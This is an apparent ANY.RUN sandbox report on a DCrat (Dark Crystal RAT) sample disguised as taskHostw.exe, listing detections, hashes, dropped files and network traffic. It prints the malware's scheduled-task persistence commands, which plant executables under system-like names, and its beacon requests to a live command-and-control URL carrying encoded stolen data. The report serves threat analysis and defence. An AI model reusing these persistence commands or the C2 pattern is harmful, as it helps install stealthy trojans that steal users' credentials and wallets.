File name:

taskHostw.exe

Full analysis: https://app.any.run/tasks/8734e9c2-f20e-4664-a213-e7976317d0c2
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: January 23, 2025, 15:44:39
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
rat
dcrat
remote
darkcrystal
netreactor
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

9ACAC2F1709100C4F471C5C4D9A6559A

SHA1:

B0DE7B3D1340BB3EDC9B67A6AE2BE9D25F1E6172

SHA256:

E7FE25F706806440E04205B7FBE8C4DC0BEF064327770B7BA7682917090509F5

SSDEEP:

24576:HZPrK87M5rSv0lvPZsmOIjWCqY3HYkGkt26yfs/kqiAbqOKy2:HFrKj5G0lvh5OWWC46yfkTiAbqOKy2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 6576)

    • Actions looks like stealing of personal data

      • dasHost.exe (PID: 5256)

    • DCRAT mutex has been found

      • dasHost.exe (PID: 5256)

    • DARKCRYSTAL has been detected (SURICATA)

      • dasHost.exe (PID: 5256)

    • DCRAT has been detected (YARA)

      • dasHost.exe (PID: 5256)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)

    • Executable content was dropped or overwritten

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6576)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 6576)
      • Bridgebrokerperf.exe (PID: 7024)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6576)
      • Bridgebrokerperf.exe (PID: 7024)

    • The process creates files with name similar to system file names

      • Bridgebrokerperf.exe (PID: 7024)

    • Executed via WMI

      • schtasks.exe (PID: 7132)
      • schtasks.exe (PID: 7152)
      • schtasks.exe (PID: 3816)
      • schtasks.exe (PID: 6220)
      • schtasks.exe (PID: 6388)
      • schtasks.exe (PID: 3952)
      • schtasks.exe (PID: 5788)
      • schtasks.exe (PID: 4996)
      • schtasks.exe (PID: 6236)
      • schtasks.exe (PID: 4872)
      • schtasks.exe (PID: 6284)
      • schtasks.exe (PID: 6400)
      • schtasks.exe (PID: 6384)
      • schtasks.exe (PID: 6356)
      • schtasks.exe (PID: 6336)
      • schtasks.exe (PID: 6332)
      • schtasks.exe (PID: 6360)
      • schtasks.exe (PID: 3984)
      • schtasks.exe (PID: 5268)
      • schtasks.exe (PID: 4308)
      • schtasks.exe (PID: 6212)
      • schtasks.exe (PID: 4716)
      • schtasks.exe (PID: 6016)
      • schtasks.exe (PID: 3364)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 624)

    • Reads the date of Windows installation

      • Bridgebrokerperf.exe (PID: 7024)

    • Reads browser cookies

      • cmd.exe (PID: 624)

    • There is functionality for taking screenshot (YARA)

      • dasHost.exe (PID: 5256)

  • INFO

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • taskHostw.exe (PID: 6484)

    • Reads the computer name

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)
      • dasHost.exe (PID: 5256)

    • Checks supported languages

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)
      • dasHost.exe (PID: 5256)

    • Process checks computer location settings

      • taskHostw.exe (PID: 6484)
      • Bridgebrokerperf.exe (PID: 7024)

    • The process uses the downloaded file

      • taskHostw.exe (PID: 6484)
      • wscript.exe (PID: 6576)
      • Bridgebrokerperf.exe (PID: 7024)

    • Reads Environment values

      • Bridgebrokerperf.exe (PID: 7024)

    • Reads the machine GUID from the registry

      • Bridgebrokerperf.exe (PID: 7024)
      • dasHost.exe (PID: 5256)

    • Failed to create an executable file in Windows directory

      • Bridgebrokerperf.exe (PID: 7024)

    • Create files in a temporary directory

      • Bridgebrokerperf.exe (PID: 7024)

    • .NET Reactor protector has been detected

      • dasHost.exe (PID: 5256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:12:01 18:00:55+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 201216
InitializedDataSize: 255488
UninitializedDataSize: -
EntryPoint: 0x1ec40
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
151
Monitored processes
33
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start taskhostw.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs bridgebrokerperf.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs w32tm.exe no specs #DARKCRYSTAL dashost.exe

Process information

PID
CMD
Path
Indicators
Parent process
624C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\85dXevlLtp.bat" "C:\Windows\System32\cmd.exeBridgebrokerperf.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1804\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3364schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\webfontSessionBrokerHost\TextInputHost.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3816schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Cookies\dasHost.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3952schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 12 /tr "'C:\webfontSessionBrokerHost\ctfmon.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3984schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\webfontSessionBrokerHost\OfficeClickToRun.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4308schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\webfontSessionBrokerHost\OfficeClickToRun.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4716schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\webfontSessionBrokerHost\TextInputHost.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4872schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\webfontSessionBrokerHost\MoUsoCoreWorker.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4996schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Documents\My Pictures\UserOOBEBroker.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
4 188
Read events
4 171
Write events
17
Delete events
0

Modification events

(PID) Process:(6484) taskHostw.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(7024) Bridgebrokerperf.exeKey:HKEY_CURRENT_USER\SOFTWARE\1d13ccc827c06c3f10085430bdd48b97e2b4b945
Operation:writeName:9dada1c28716a69b2759b57224a22f86ed6d3b82
Value:
WyJDOlxcd2ViZm9udFNlc3Npb25Ccm9rZXJIb3N0XFxCcmlkZ2Vicm9rZXJwZXJmLmV4ZSIsIkM6XFxVc2Vyc1xcRGVmYXVsdFxcQ29va2llc1xcZGFzSG9zdC5leGUiLCJDOlxcVXNlcnNcXERlZmF1bHRcXERvY3VtZW50c1xcTXkgUGljdHVyZXNcXFVzZXJPT0JFQnJva2VyLmV4ZSIsIkM6XFx3ZWJmb250U2Vzc2lvbkJyb2tlckhvc3RcXGZvbnRkcnZob3N0LmV4ZSIsIkM6XFx3ZWJmb250U2Vzc2lvbkJyb2tlckhvc3RcXGN0Zm1vbi5leGUiLCJDOlxcd2ViZm9udFNlc3Npb25Ccm9rZXJIb3N0XFxkbGxob3N0LmV4ZSIsIkM6XFx3ZWJmb250U2Vzc2lvbkJyb2tlckhvc3RcXE1vVXNvQ29yZVdvcmtlci5leGUiLCJDOlxcd2ViZm9udFNlc3Npb25Ccm9rZXJIb3N0XFxPZmZpY2VDbGlja1RvUnVuLmV4ZSIsIkM6XFx3ZWJmb250U2Vzc2lvbkJyb2tlckhvc3RcXFRleHRJbnB1dEhvc3QuZXhlIl0=
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5256) dasHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
10
Suspicious files
3
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
7024Bridgebrokerperf.exeC:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\dasHost.exeexecutable
MD5:1465B464FF78A41CF8AF12D58CA62588
SHA256:485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A
6484taskHostw.exeC:\webfontSessionBrokerHost\Ur1NipdNxN.vbebinary
MD5:56F8DFB763248F67943AFCC431C9A28C
SHA256:DB5202ACF3A53D23F14FAA846E27C2415CB33C26B5AC151A298209A0E7A1E4AC
7024Bridgebrokerperf.exeC:\webfontSessionBrokerHost\ctfmon.exeexecutable
MD5:1465B464FF78A41CF8AF12D58CA62588
SHA256:485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A
7024Bridgebrokerperf.exeC:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\21b1a557fd31cctext
MD5:F9089D7041F08947052617FB74C7391A
SHA256:54A2AC9BDC3DA6F1969EE5D89AC361103A13A78680EBE5508E988EC373E885E0
7024Bridgebrokerperf.exeC:\Users\Default\Pictures\7ccfebd9e92364text
MD5:FD327AD794DBA3A476BFD2E3C1E5823F
SHA256:C638172460AC304DA20E285B7AB9E96FBE8C4282B80DF0902201B44BECE60B33
5256dasHost.exeC:\ProgramData\USOPrivate\UpdateStore\store.db
MD5:
SHA256:
7024Bridgebrokerperf.exeC:\webfontSessionBrokerHost\fontdrvhost.exeexecutable
MD5:1465B464FF78A41CF8AF12D58CA62588
SHA256:485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A
7024Bridgebrokerperf.exeC:\webfontSessionBrokerHost\MoUsoCoreWorker.exeexecutable
MD5:1465B464FF78A41CF8AF12D58CA62588
SHA256:485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A
6484taskHostw.exeC:\webfontSessionBrokerHost\SpdD9zKqJDT3l.battext
MD5:37E781C64E1E5057220CC587925258D4
SHA256:24510BBFD8F20C029B17D88853E82DBC2D2637B52DC76BE8CEEBF57243CAC344
7024Bridgebrokerperf.exeC:\webfontSessionBrokerHost\dllhost.exeexecutable
MD5:1465B464FF78A41CF8AF12D58CA62588
SHA256:485228DC5BFEB7694133FD50861F0C48F314003F8EE1030DB3D063D07930BD3A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
108
TCP/UDP connections
21
DNS requests
7
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.53.40.178:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4536
svchost.exe
GET
200
23.53.40.178:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4536
svchost.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&b59bfcc0d57f99bb2fa0b2e32b69c919=0VfiIiOiQGOygTMjFWNhJDZkNWMlZmYwIDM1ATM0Y2NmlTO3YWZiwiI4AzYkFzYyQWMmJGNxITZllTNhJTZmFzNxgzYxEmY0QWYkdDZ5gTO2IiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&565015d3235842a2ec38a93523e57197=QX9JSOKl3YsxmMhZXOyE1Y4ZEZzZFWZ1mVHJ1Y4FzY5ZlMjZFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJZHbHpVMGVUSzsmeKRkRFlkcWdEZzZ0VaNlQTxUenNUS1xWRJxWNXFWT1cEW5hnVkJkQ55UNjlXUCJUehxmUIJGaW1WVnBTaN9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQGOygTMjFWNhJDZkNWMlZmYwIDM1ATM0Y2NmlTO3YWZiwiI4AzYkFzYyQWMmJGNxITZllTNhJTZmFzNxgzYxEmY0QWYkdDZ5gTO2IiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?gMS8R0TTNrfpMV2m=wZXUAIllMEditJ8HNWYLah&df20dbcdf815a7f1fcc21b05ecb0bc52=a447e0ec211c9a451aab62e84acf4a0d&d40967e42e49cc99f8f4737461f68248=wNlhjZycjZ5Y2YxMDNiZjNmNjNwQmY4kDOkNWY4MWMjdjNhhzMyUTY&gMS8R0TTNrfpMV2m=wZXUAIllMEditJ8HNWYLah
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&2b0ec457d6393348e60633ec46b0c081=d1nIxMzYjVWOzIWMjNTM5UmZxUzMzgjNxQWMiVjYjVzMhVmMxkTM1QWYyIiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W&b59bfcc0d57f99bb2fa0b2e32b69c919=QX9JiI6ICZ4IDOxMWY1EmMkR2YxUmZiBjMwUDMxQjZ3YWO5cjZlJCLiEzMjNWZ5MjYxM2MxkTZmFTNzMDO2EDZxIWNiNWNzEWZyETOxUDZhJjI6ISY2EzN5AzY0MjZ4ETYklDZlRzY3QjM1kTMwgDMzUDZmJCLicjM0gzNjdDM1YTMyYjZ0MWZ5QTO3UzMwkDNwIGN4kDO0ATZ0UTZzEmI6ICOjFGMmFzN3gjMhhTM4ETO4MjNyczMzcjNiNzYyUWN2Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeOhXSqxUe3N1TwkERPV3ZE5UavpWSqlzRil2dpl0UatWS2k0UllnUuJWM5ITWpdXaJxWNXFGbOZFTsJ1VMpnUYRGaotWS2kUaiZHbyoFbK5WSzlUejxmSuRWOrczN5syN3QlSp9UarhEZw5UbJNXS51kM0kWT3VkaMBzYU1UdnR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQGOygTMjFWNhJDZkNWMlZmYwIDM1ATM0Y2NmlTO3YWZiwiIjRDNyQGMwYjY0ETOyAjYykjMwcTZmNjNyEjZkJ2N3UWZ3YGM1YjZ0IiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&2b0ec457d6393348e60633ec46b0c081=d1nIxMzYjVWOzIWMjNTM5UmZxUzMzgjNxQWMiVjYjVzMhVmMxkTM1QWYyIiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W&b59bfcc0d57f99bb2fa0b2e32b69c919=QX9JiI6ICZ4IDOxMWY1EmMkR2YxUmZiBjMwUDMxQjZ3YWO5cjZlJCLiEzMjNWZ5MjYxM2MxkTZmFTNzMDO2EDZxIWNiNWNzEWZyETOxUDZhJjI6ISY2EzN5AzY0MjZ4ETYklDZlRzY3QjM1kTMwgDMzUDZmJCLicjM0gzNjdDM1YTMyYjZ0MWZ5QTO3UzMwkDNwIGN4kDO0ATZ0UTZzEmI6ICOjFGMmFzN3gjMhhTM4ETO4MjNyczMzcjNiNzYyUWN2Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0